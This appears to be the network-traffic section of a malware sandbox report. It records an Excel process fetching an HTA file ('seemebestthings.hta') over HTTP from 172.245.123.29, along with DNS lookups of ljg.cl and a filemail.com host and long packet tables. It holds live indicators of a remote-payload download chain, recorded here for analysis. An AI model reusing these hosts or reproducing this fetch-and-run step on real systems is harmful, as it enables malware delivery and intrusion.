Nov 28, 2024 07:28:17.984885931 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:17.984905005 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:17.985135078 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:17.988841057 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:17.988909006 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.065979958 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.065999031 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.066122055 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.069926023 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.070002079 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.070017099 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.070091009 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.078351974 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.081331968 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.081403017 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.081461906 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.081478119 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.081513882 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.089785099 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.089863062 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.089905024 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.089956045 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.098226070 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.098301888 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.098316908 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.098392010 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.106630087 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.106722116 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.106729031 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.109325886 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.115065098 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.115104914 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.115175009 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.115214109 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.123488903 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.123538971 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.123558998 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.123619080 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.131181955 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.131236076 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.131283998 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.131329060 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.138886929 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.138942957 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.138978004 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.139041901 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.146570921 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.146621943 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.146701097 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.146750927 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.186206102 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.186266899 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.267003059 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.267035007 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.267064095 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.267098904 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.268255949 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.268296003 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.268368006 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.268410921 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.273112059 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.273156881 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.273180008 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.273217916 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.277883053 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.277921915 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.277967930 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.278017044 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.282766104 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.282808065 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.282885075 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.282946110 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.287548065 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.287591934 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.287642956 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.287692070 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.292402983 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.292448044 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.292506933 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.292537928 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.297234058 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.297276974 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.297497034 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.297543049 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.301944971 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.302031994 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.302056074 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.302079916 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.306746960 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.306828022 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.306854963 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.306914091 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.311568975 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.311615944 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.311681986 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.311758995 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.316390991 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.316431046 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.316553116 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.316585064 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.320292950 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.320313931 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.320331097 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.320427895 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.324029922 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.324069977 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.324139118 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.324207067 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.327877045 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.327922106 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.327986956 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.328039885 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.331690073 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.331742048 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.331800938 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.331837893 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.335608959 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.335656881 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.335736990 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.335772991 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.339368105 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.339417934 CET     49167        80  192.168.2.22    172.245.123.29
Nov 28, 2024 07:28:18.339476109 CET        80     49167  172.245.123.29  192.168.2.22
Nov 28, 2024 07:28:18.339519024 CET     49167        80  192.168.2.22    172.245.123.29
                                                                      Nov 28, 2024 07:28:18.343170881 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.343215942 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.343369961 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.343445063 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.347033978 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.347101927 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.347103119 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.347343922 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.350877047 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.350925922 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.350943089 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.350982904 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.354656935 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.354717970 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.354720116 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.354811907 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.468398094 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.468453884 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.468460083 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.468508005 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.469783068 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.469829082 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.469898939 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.469985962 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.472635984 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.472676992 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.472795963 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.472831964 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.475471020 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.475528002 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.475570917 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.475613117 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.478349924 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.478391886 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.478450060 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.478513002 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.481137991 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.481193066 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.481249094 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.481292009 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.483834982 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.483892918 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.483937979 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.483989000 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.486365080 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.486423016 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.486526966 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.486572981 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.489192009 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.489330053 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.489362001 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.489379883 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.491784096 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.491838932 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.492033005 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.492084980 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.494479895 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.494514942 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.494550943 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.494550943 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.497129917 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.497184038 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.497386932 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.497433901 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.499761105 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.499803066 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.499862909 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.499902964 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.502449989 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.502556086 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.502588987 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.502588987 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.505126953 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.505197048 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.505224943 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.505265951 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.507812977 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.507891893 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.508034945 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.508086920 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.510488033 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.510545969 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.510610104 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.510652065 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.513195992 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.513286114 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.513318062 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.513366938 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.515878916 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.515927076 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.515949011 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.516001940 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.518547058 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.518647909 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.518687963 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.518687963 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.521260023 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.521305084 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.521339893 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.521339893 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.523886919 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.523946047 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.523984909 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.524030924 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.526582956 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.526653051 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.526689053 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.526748896 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.529241085 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.529297113 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.529330015 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.529376030 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.531939983 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.531997919 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.532040119 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.532083988 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.534616947 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.534671068 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.534719944 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.534765005 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.588527918 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.588579893 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.588619947 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.589055061 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.589926958 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.590020895 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.590069056 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.590114117 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:18.592519045 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:18.592559099 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:22.879293919 CET8049167172.245.123.29192.168.2.22
                                                                      Nov 28, 2024 07:28:22.879365921 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:25.954195023 CET49168443192.168.2.22193.30.119.205
                                                                      Nov 28, 2024 07:28:25.954257011 CET44349168193.30.119.205192.168.2.22
                                                                      Nov 28, 2024 07:28:25.954329014 CET49168443192.168.2.22193.30.119.205
                                                                      Nov 28, 2024 07:28:25.977226019 CET49168443192.168.2.22193.30.119.205
                                                                      Nov 28, 2024 07:28:25.977245092 CET44349168193.30.119.205192.168.2.22
                                                                      Nov 28, 2024 07:28:26.928174019 CET4916780192.168.2.22172.245.123.29
                                                                      Nov 28, 2024 07:28:27.813416004 CET44349168193.30.119.205192.168.2.22
                                                                      Nov 28, 2024 07:28:27.813606024 CET49168443192.168.2.22193.30.119.205
                                                                      Nov 28, 2024 07:28:27.818326950 CET49168443192.168.2.22193.30.119.205
                                                                      Nov 28, 2024 07:28:27.818340063 CET44349168193.30.119.205192.168.2.22
                                                                      Nov 28, 2024 07:28:27.818620920 CET44349168193.30.119.205192.168.2.22
                                                                      Nov 28, 2024 07:28:27.878201962 CET49168443192.168.2.22193.30.119.205
                                                                      Nov 28, 2024 07:28:27.923330069 CET44349168193.30.119.205192.168.2.22
                                                                      Nov 28, 2024 07:28:28.292267084 CET44349168193.30.119.205192.168.2.22
                                                                      Nov 28, 2024 07:28:28.301137924 CET44349168193.30.119.205192.168.2.22
                                                                      Nov 28, 2024 07:28:28.301250935 CET49168443192.168.2.22193.30.119.205
                                                                      Nov 28, 2024 07:28:28.304003000 CET49168443192.168.2.22193.30.119.205
                                                                       Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                       Nov 28, 2024 07:27:57.274409056 CET | 54562 | 53 | 192.168.2.22 | 8.8.8.8
                                                                       Nov 28, 2024 07:27:57.531128883 CET | 53 | 54562 | 8.8.8.8 | 192.168.2.22
                                                                       Nov 28, 2024 07:28:06.491487980 CET | 52917 | 53 | 192.168.2.22 | 8.8.8.8
                                                                       Nov 28, 2024 07:28:06.752451897 CET | 53 | 52917 | 8.8.8.8 | 192.168.2.22
                                                                       Nov 28, 2024 07:28:06.782918930 CET | 52917 | 53 | 192.168.2.22 | 8.8.8.8
                                                                       Nov 28, 2024 07:28:07.050187111 CET | 53 | 52917 | 8.8.8.8 | 192.168.2.22
                                                                       Nov 28, 2024 07:28:07.068228006 CET | 52917 | 53 | 192.168.2.22 | 8.8.8.8
                                                                       Nov 28, 2024 07:28:07.190926075 CET | 53 | 52917 | 8.8.8.8 | 192.168.2.22
                                                                       Nov 28, 2024 07:28:25.305689096 CET | 62751 | 53 | 192.168.2.22 | 8.8.8.8
                                                                       Nov 28, 2024 07:28:25.687628984 CET | 53 | 62751 | 8.8.8.8 | 192.168.2.22
                                                                       Nov 28, 2024 07:28:25.701416016 CET | 57893 | 53 | 192.168.2.22 | 8.8.8.8
                                                                       Nov 28, 2024 07:28:25.951210976 CET | 53 | 57893 | 8.8.8.8 | 192.168.2.22
                                                                       Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                       Nov 28, 2024 07:27:57.274409056 CET | 192.168.2.22 | 8.8.8.8 | 0xc1aa | Standard query (0) | ljg.cl | A (IP address) | IN (0x0001) | false
                                                                       Nov 28, 2024 07:28:06.491487980 CET | 192.168.2.22 | 8.8.8.8 | 0x43af | Standard query (0) | ljg.cl | A (IP address) | IN (0x0001) | false
                                                                       Nov 28, 2024 07:28:06.782918930 CET | 192.168.2.22 | 8.8.8.8 | 0x43af | Standard query (0) | ljg.cl | A (IP address) | IN (0x0001) | false
                                                                       Nov 28, 2024 07:28:07.068228006 CET | 192.168.2.22 | 8.8.8.8 | 0x43af | Standard query (0) | ljg.cl | A (IP address) | IN (0x0001) | false
                                                                       Nov 28, 2024 07:28:25.305689096 CET | 192.168.2.22 | 8.8.8.8 | 0xba08 | Standard query (0) | 3105.filemail.com | A (IP address) | IN (0x0001) | false
                                                                       Nov 28, 2024 07:28:25.701416016 CET | 192.168.2.22 | 8.8.8.8 | 0xc50a | Standard query (0) | 3105.filemail.com | A (IP address) | IN (0x0001) | false
                                                                       Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                       Nov 28, 2024 07:27:57.531128883 CET | 8.8.8.8 | 192.168.2.22 | 0xc1aa | No error (0) | ljg.cl | - | 152.231.117.86 | A (IP address) | IN (0x0001) | false
                                                                       Nov 28, 2024 07:28:06.752451897 CET | 8.8.8.8 | 192.168.2.22 | 0x43af | No error (0) | ljg.cl | - | 152.231.117.86 | A (IP address) | IN (0x0001) | false
                                                                       Nov 28, 2024 07:28:07.050187111 CET | 8.8.8.8 | 192.168.2.22 | 0x43af | No error (0) | ljg.cl | - | 152.231.117.86 | A (IP address) | IN (0x0001) | false
                                                                       Nov 28, 2024 07:28:07.190926075 CET | 8.8.8.8 | 192.168.2.22 | 0x43af | No error (0) | ljg.cl | - | 152.231.117.86 | A (IP address) | IN (0x0001) | false
                                                                       Nov 28, 2024 07:28:25.687628984 CET | 8.8.8.8 | 192.168.2.22 | 0xba08 | No error (0) | 3105.filemail.com | ip.3105.filemail.com | - | CNAME (Canonical name) | IN (0x0001) | false
                                                                       Nov 28, 2024 07:28:25.687628984 CET | 8.8.8.8 | 192.168.2.22 | 0xba08 | No error (0) | ip.3105.filemail.com | - | 193.30.119.205 | A (IP address) | IN (0x0001) | false
                                                                       Nov 28, 2024 07:28:25.951210976 CET | 8.8.8.8 | 192.168.2.22 | 0xc50a | No error (0) | 3105.filemail.com | ip.3105.filemail.com | - | CNAME (Canonical name) | IN (0x0001) | false
                                                                       Nov 28, 2024 07:28:25.951210976 CET | 8.8.8.8 | 192.168.2.22 | 0xc50a | No error (0) | ip.3105.filemail.com | - | 193.30.119.205 | A (IP address) | IN (0x0001) | false
                                                                      • ljg.cl
                                                                      • 3105.filemail.com
                                                                      • 172.245.123.29
                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                       0 | 192.168.2.22 | 49164 | 172.245.123.29 | 80 | 3620 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                       Nov 28, 2024 07:28:04.629838943 CET | 349 | OUT | GET /1343/erg/seemebestthings.hta HTTP/1.1
                                                                      Accept: */*
                                                                      UA-CPU: AMD64
                                                                      Accept-Encoding: gzip, deflate
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                      Host: 172.245.123.29
                                                                      Connection: Keep-Alive
                                                                       Nov 28, 2024 07:28:05.785815954 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                      Date: Thu, 28 Nov 2024 06:28:05 GMT
                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                      Last-Modified: Wed, 27 Nov 2024 07:03:04 GMT
                                                                      ETag: "320bd-627df8e9c34e4"
                                                                      Accept-Ranges: bytes
